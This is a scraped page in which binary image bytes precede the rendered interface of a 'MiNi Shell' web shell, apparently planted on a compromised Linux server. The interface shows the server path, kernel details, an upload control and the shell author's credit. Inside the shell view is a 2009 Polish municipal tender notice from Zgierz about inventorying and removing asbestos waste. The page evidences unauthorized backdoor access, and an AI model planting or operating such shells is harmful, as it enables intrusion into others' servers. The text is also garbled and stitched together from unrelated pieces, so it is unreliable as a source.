JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090601/84327-N-2009.html

<p class="kh_header"><b>Zgierz: Wykonanie  aktualizacji inwentaryzacji, programu i planu usuwania odpadów wyrobów zawierających azbest z budynków oraz obiektów budowlanych z terenu miasta Zgierza</b><br>
<b>Numer ogłoszenia: 84327 - 2009; data zamieszczenia: 01.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Zgierz , Plac Jana Pawła II 16, 95-100 Zgierz, woj. łódzkie, tel. 0427162854 w. 200, 7143200, faks 042 7143203.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  aktualizacji inwentaryzacji, programu i planu usuwania odpadów wyrobów zawierających azbest z budynków oraz obiektów budowlanych z terenu miasta Zgierza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie aktualizacji inwentaryzacji odpadów wyrobów zawierających  azbest z budynków oraz obiektów budowlanych ( w tym budynków użyteczności publicznej) z terenu miasta Zgierza, opracowanie programu i planu usuwania odpadów wyrobów zawierających azbest wraz z przygotowaniem dokumentacji i wystąpieniem o dofinansowanie         z funduszy unijnych. Wykaz rejonów podlegających inwentaryzacji odpadów zawierających azbest, wskazanych na mapie miasta Zgierza wraz z mapą miasta Zgierza stanowi załącznik nr 1               do niniejszego opisu. 
W przypadku stwierdzenia występowania odpadów wyrobów zawierających azbest, Wykonawca jest zobowiązany sporządzić protokoły inwentaryzacyjne oddzielnie dla osób fizycznych prowadzących działalność gospodarczą oraz oddzielnie dla osób fizycznych, będących właścicielami danej posesji i osób prawnych, będących właścicielami nieruchomości lub posiadających pełnomocnictwo do reprezentacji właściciela,  wraz z oceną stanu technicznego odpadu wyrobu zawierającego azbest. Obowiązujący wzór protokołu jest załącznikiem do opisu przedmiotu zamówienia (załącznik nr 2). Równocześnie Wykonawca zobowiązany jest sporządzić informację o odpadach wyrobów zawierających azbest i miejscu ich wykorzystania zgodnie z załącznikiem nr 3 do niniejszego opisu.
Jeżeli pod danym adresem nie znajdują się żadne odpady wyrobów zawierających azbest Wykonawca  również winien sporządzić spis tych miejsc ( adresów)  i potwierdzić ten zapis przez właściciela lub pełnoletnią osobę upoważnioną do udzielania tego typu informacji w imieniu właściciela (wg załącznika nr 3)
Obmiar lub ustalenie, że pod danym adresem nie ma odpadu wyrobu zawierającego azbest będą każdorazowo potwierdzone podpisem osoby upoważnionej lub właściciela wg załączonego wzoru .
 Inwentaryzacja odpadów wyrobów zawierających azbest obejmować musi również dokonanie szacunkowego obmiaru w m2 lub oszacowanie ilości w tonach. Jednostka szacunku ilości uzależniona będzie od rodzaju odpadu wyrobu zawierającego azbest. 
Ustalenie, że pod danym adresem znajdują się odpady wyrobów zawierających azbest, podanie ich rodzaju i ustalenie szacowanych ilości każdorazowo będzie potwierdzone podpisem właściciela obiektu lub osoby upoważnionej. W protokole inwentaryzacyjnym Wykonawca powinien podać sposób użytkowania budynku, w którym występują odpady wyrobów zawierających azbest            ze względu na zróżnicowaną stawkę podatku VAT przy prowadzeniu tego rodzaju prac                 (7% dla budynków mieszkalnych, 22% dla pozostałych). Protokoły inwentaryzacyjne powinny    być dostarczone w wersji papierowej oraz elektronicznej. Do protokołów inwentaryzacyjnych Wykonawca zobowiązany jest dołączyć dokumentację fotograficzną inwentaryzowanych obiektów w celu zobrazowania ich wyglądu. Dokumentacja fotograficzna powinna być dostarczona               na nośniku elektronicznym jako link do formularzy inwentaryzacyjnych oraz w wersji papierowej,      z naniesieniem adresu, pod którym znajduje się wskazany obiekt.
W ramach zamówienia Wykonawca zobowiązany jest wykonać plan i program usuwania odpadów wyrobów zawierających azbest z terenu miasta Zgierza, który powinien zawierać między innymi:
szczegółowy harmonogram działań na lata 2009-2013,
system usuwania wyrobów zawierających azbest,
-     analizę ekonomiczną i technologiczną planu,
analizę oddziaływania planu na środowisko,
sposób i źródła finansowania działań.
Wymagane jest również przeprowadzenie badań pod kątem zawartości pyłów azbestowych            w powietrzu i zamieszczenie ich wyników w opisywanym dokumencie.
W ramach zadania Wykonawca przygotowuje również wniosek o dofinansowanie z funduszy unijnych w ramach Regionalnego Programu Operacyjnego, jak również Studium Wykonalności stanowiące załącznik do wniosku.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.65.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy: 1) spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt. 1 - 4 prawa zamówień publicznych, tj. którzy: 1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 prawa zamówień publicznych, według którego : 1. Z postępowania o udzielenie zamówienia wyklucza się: 1) wykonawców, którzy wyrządzili szkodę, niewykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania; 2) wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego; 3) wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 4) osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 5) spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 6) spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 7) spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 8) osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego; 9) podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary; 10) wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3. 2. Z postępowania o udzielenie zamówienia wyklucza się również wykonawców, którzy: 1) wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; przepisu nie stosuje się do wykonawców, którym udziela się zamówienia na podstawie art. 62 ust. 1 pkt 2 lub art. 67 ust. 1 pkt 1 i 2; 2) złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania; 3) nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków lub złożone dokumenty zawierają błędy, z zastrzeżeniem art. 26 ust. 3; 4) nie wnieśli wadium, w tym również na przedłużony okres związania ofertą, lub nie zgodzili się na przedłużenie okresu związania ofertą. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy potwierdzą, że: - posiadają wymagane uprawnienia do wykonywania określonej (właściwej dla realizacji przedmiotu niniejszego zamówienia) działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; - wykonali, a w przypadku świadczeń okresowych lub ciągłych również którzy 
                wykonują, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania 
                o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - 
                w tym okresie, co najmniej 1 usługę  odpowiadającą swoim 
                                                                                     
                rodzajem usługom  stanowiącym przedmiot zamówienia, tj. wykonanie 
                inwentaryzacji o wartości co najmniej 100 000,00 zł, potwierdzone załączonymi 
                dokumentami (np. referencjami), że usługi  zostały wykonane należycie.
 Ocena spełniania warunków wymaganych od Wykonawców będzie dokonana na podstawie niżej wymienionych oświadczeń i dokumentów wg kryterium: spełnia - nie spełnia, przy czym niespełnienie warunków udziału w postępowaniu skutkuje wykluczeniem Wykonawcy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, a w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - oświadczenie Podmiotu Składowego o spełnianiu warunków udziału w postępowaniu podpisane odrębnie przez każdy podmiot składowy oraz, dodatkowo: - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert. Zamawiający uzna za dokument wystawiony w wymaganym terminie również kopię tego dokumentu, wystawioną wcześniej, ale potwierdzoną w wymaganym terminie, odnośnie jej aktualności, przez organ wydający (w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - dokument składany odrębnie przez każdy podmiot składowy); - wykaz  usług , wykonanych, a w przypadku świadczeń okresowych 
                 lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed dniem 
                 wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia
                 działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem 
                 i wartością  usługom stanowiącym przedmiot zamówienia z podaniem
                 ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów 
                 potwierdzających, że te usługi zostały wykonane należycie 
              
(w przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia - dokument składany wspólnie).
 Dodatkowo, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia - w szczególności - do podpisania oferty wraz z załącznikami - o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę - - złożone w formie oryginału, kopii (odpisu, wypisu) potwierdzonej przez udzielającego pełnomocnictwa lub kopii (odpisu, wypisu) poświadczonej przez notariusza. UWAGA I: Podmioty wspólnie ubiegające się o udzielenie zamówienia winny złożyć pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę, np. z umowy konsorcjum. Pełnomocnictwo to powinno wskazywać wszystkie podmioty, które wspólnie ubiegają się o udzielenie zamówienia publicznego, a także zawierać deklarację wszystkich uczestników konsorcjum (również tzw. Lidera Konsorcjum), co do ustanowienia pełnomocnika. UWAGA II: Spółka cywilna ubiegająca się o udzielenie zamówienia nie ma obowiązku powoływania pełnomocnika i może być reprezentowana przez wspólników - każdego wspólnika - na ogólnych zasadach reprezentacji spółki cywilnej, zgodnie z przepisami Kodeksu cywilnego, chyba że umowa lub uchwała wspólników stanowi odmiennie. UWAGA III: Umowa regulująca współpracę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (umowa konsorcjum) będzie wymagana przed zawarciem umowy, jeżeli oferta tych Wykonawców zostanie wybrana.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.umz.zgierz.pl/przetargi/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgierza, 95-100 Zgierz, Plac Jana Pawła II 16, pokój nr 203, za cenę 6.59 PLN (wpłata w pokoju nr 014) lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 12:45, miejsce: Urząd Miasta Zgierza, 95-100 Zgierz, Plac Jana Pawła II 16, pokój nr 105.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 13.07.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: - w sprawach merytorycznych: 1) Grzegorz Stefaniak, z-ca naczelnika, ul. 1 Maja 5 (USC) pok. nr 8, tel.: (0 42) 716-39-75, 2) Wojciech Mokrzyński, specjalista, ul. 1 Maja 5 (USC) pok. nr 8, tel.: (0 42) 716-39-75; - w sprawach proceduralnych: 1) Zofia Zamojska, gł. specjalista i 2) Lech Dąbski, naczelnik, pok. 203, tel.: (0 42) 714-32-00 oraz 3) Ewa Stasiak, inspektor, pok. 205, tel.: (0 42) 714-32-34. Postępowanie 
o udzielenie zamówienia prowadzi się z zachowaniem formy pisemnej, przy czym oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują pisemnie lub faksem, albo drogą elektroniczną. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia (w tym - protesty), wnioski, zawiadomienia oraz informacje faksem, każda ze stron na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania. W przypadku zastosowania przez Wykonawcę elektronicznej formy porozumiewania się z Zamawiającym - wymagane jest telefoniczne uprzedzenie Zamawiającego o takim zamiarze na numer: 0-42

Creat By MiNi SheLL
Email: jattceo@gmail.com